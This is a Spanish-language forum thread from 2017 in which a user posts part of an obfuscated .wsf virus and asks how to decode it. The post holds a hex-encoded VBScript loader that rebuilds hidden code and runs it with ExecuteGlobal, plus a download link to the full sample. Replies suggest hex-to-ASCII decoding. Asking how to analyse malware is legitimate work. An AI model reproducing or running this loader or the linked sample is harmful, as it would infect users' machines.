descifrar virus .wsf

Iniciado por **Aincrad**, 9 Agosto 2017, 16:44 PM

0 Miembros y 1 Visitante están viendo este tema.

**Aincrad**

hola a todos, traigo un virus con formato wsf , alguien sabe como ddesencriptar
el codigo de este virus.


parte de el code :  el codigo no esta completo porque solo puedo publicar 1000 lineas.

code:
Código (actionscript) [Seleccionar]

<?XML version="1.0"?><job>

<script language="VBScript">

<![CDATA[

FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("44696D204F6178737A4D676757574747796D616766784F785162566747734654796B79444F556568727A4C514C79705A6D657A564D6642704345755568697641665376485966615048637A6D544F5550")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("4A544C554978794E4A43426D6B4D4E676C48664275626F45657647724C63446B4155646C62725479436563744A517268557142666A62486B4A6551444578734E51424C4A4B506B794265545A6D4B4B79464941566E697A6A71694E5244566C744E512C20726E706377467457507051726D43436F4E5A5675556B716F654D534B")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("435A64746269456B594D51676F71736A6742424254527A664F53575162436F5368666F76754C7874425A644F494166777446444576796F4E59557A534D594B51536177437843716A6846557563675A796A5265504F6A4D64416649676371657971706A744E775A4F4F75444D437972536E5744796E534D7574426D6D686B4C79")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("5942424B4849726B425A4C556356594D6E792C206661594147674354506B6C4C50746C6D516458737953734946794E4F704E635469596C4D7374457477584554456A5650764F595876746F4457646278514353586449614F684B776746635167796946796E617A45514D76484F6D646B6E4B58555649644C795578544C576856")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("7256784E72444D7949424B786950474B51544546586B6D624B6478454567784D6952444652596B4376674B59484C414B416D577578684D696D696F52766A686E696C0D0A4F6178737A4D676757574747796D616766784F785162566747734654796B79444F556568727A4C514C79705A6D657A564D6642704345755568697641")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("665376485966615048637A6D544F55504A544C554978794E4A43426D6B4D4E676C48664275626F45657647724C63446B4155646C62725479436563744A517268557142666A62486B4A6551444578734E51424C4A4B506B794265545A6D4B4B79464941566E697A6A71694E5244566C744E51203D20222D323233392B32323738")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2A3333353934302F353539392A323135332D323036322A2D333631382B333635302A383931382D383830342A3632313435332F363135332A313830342D313730352A3132312D31302A3233323230302F323332322A2D34362B3134372A373131382D373030342A393439382D393436362A3438393430342F383433382A373232")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("35362F323235382A343935352D343835312A2D353739382B353930392A3534323736332F343633392A2D333434392B333534392A2D373839352B383030302A333530372D333339372A2D3936362B313037312A2D393132342B393135362A343132362D343038362A363933302D363833312A2D353834332B353838342A2D3533")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("362B3536382A383538382D383437332A3538322D3437352A2D3736322B3838332A373634342D373533322A3139363834392F313934392A323833382D323830362A363137332D363131352A343238392D343235372A3631393332302F353935352A383339362D383238352A353233332D353131362A333830332D333730332A35")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("32393531352F353034332A3330373132302F323739322A2D373738312B373838362A373139352D373135302A3435313936322F343433312A393035382D383933382A313537312D313533392A333537302D333437372A343533362D343437342A323731362D323730362A363237342D363236342A323037322D323033332A3533")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("36322D353330312A383835342D383830392A373930312D373834302A2D373537362B373632312A312B36302A3335303733302F373739342A373930392D373834382A36303933302F313335342A37373334382F313236382A2D393038322B393131342A38363432372F3837332A313333372D313232362A3333342D3232342A31")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("303038332D393938312A2D3133372B3234322A2D343136322B343236352A3232313732382F363932392A31373038302F3238302A3138303732302F343031362A2D343532352B343538362A2D383734332B383738382A313437392D313431382A2D353733372B353738322A363835322D363739312A3230313337352F34343735")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2A2D343634362B343730372A2D313438382B313533332A343731342D343635332A33373330352F3832392A383433302D383336392A39383530352F323138392A2D333337362B333433372A2D313635342B313639392A2D333131372B333137382A34383337352F313037352A2D363932372B363938382A363738352D36373430")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2A3631342D3535332A333730322D333635372A3131343337352F313837352A3339363831302F383831382A333231332D333135322A3132373537352F323833352A2D373736342B373832352A2D313438362B313533312A343438392D343432382A37353537302F373535372A33383432302F333834322A31303035342D393935")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("302A37343438312F3637312A2D393832382B393934332A3833303930382F373136332A2D343234382B343238302A2D343037352B343133362A3232303936302F363930352A32393835322F3837382A3236333434352F323530392A3132323839392F313236372A2D363337362B363438352A333035312D323935332A33393534")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("36392F343037372A3238332D3138342A2D393733362B393834332A2D343831362B343836322A3337343030302F333734302A3638363030302F363836302A39313330302F3833302A2D353737302B353838352A39323634342F323031342A2D363633332B363734332A31303033372D393933362A2D343537332B343638392A2D")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("333834342B333837382A39333533302F393335332A313039323839362F393735382A3534343637372F343930372A383432302D383330362A313233382D313132322A3232343332302F373031302A3236343433352F343333352A34363436342F313435322A393130382D393035392A393736312D393731302A37323631302F37")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("3236312A353930342D353739392A2D383433302B383534302A3432393036352F333733312A343432332D343330372A3637343035332F363934392A2D323735332B323836312A2D343032342B343133322A383235382D383135382A2D313639342B313739392A3139343832362F313730392A323934372D323931352A2D333037")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("392B333134302A343932352D343839332A3137323738382F353038322A39333631302F323533302A2D3232372B3334342A323930362D323739312A2D333336312B333436322A2D343031352B343132392A3339313130342F333439322A3834352D3733312A2D333639322B333830332A2D333030342B333130362A3238323636")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("302F323639322A2D363039382B363230362A2D363239312B363339322A3330383631372F383334312A39333433322F323734382A36393435302F363934352A393334362D393233382A363337362D363236362A35303239302F3437302A3433363936382F343238342A2D313636302B313736352A2D373032312B373132392A39")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("373336342F3936342A35393734342F313836372A393537372D393531362A3137343536302F353435352A3535333535322F343737322A3737303735342F363736312A2D313032312B313133382A3634393132372F363432372A39383734302F393837342A2D393132332B393233312A2D313831312B313932312A383933313239")
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("2F383334372A2D313238332B313338352A333436362D333335352A3133323531362F313232372A3331363030302F333136302A3831393831372F383131372A3234383633342F323138312A383630382F3236392A343432312D343336302A3633342D3630322A2D353231312B353332372A343539312D343437372A323530312D")

ExecuteGlobal FACEBOOKFACEBOOK

Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function

]]>

</script>

</job>


PD: aqui les dejo el virus . aqui esta el codigo completo:

link:
                  http://www.mediafire.com/file/3rgu85acp4u7uxe/virus.wsf




MCKSys Argentina

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


tincopasan

#2
lo que hay es una cadena hexa muy larga que MCKSys Argentina pasó a ascii, lo que te faltaría es ver la representación de chr(eval(cadena)) para que el código sea más legible
Intenta pasar todo de hexa a ascii primero, veras lo posteado y después ver el código de las funciones ocultas en vbscript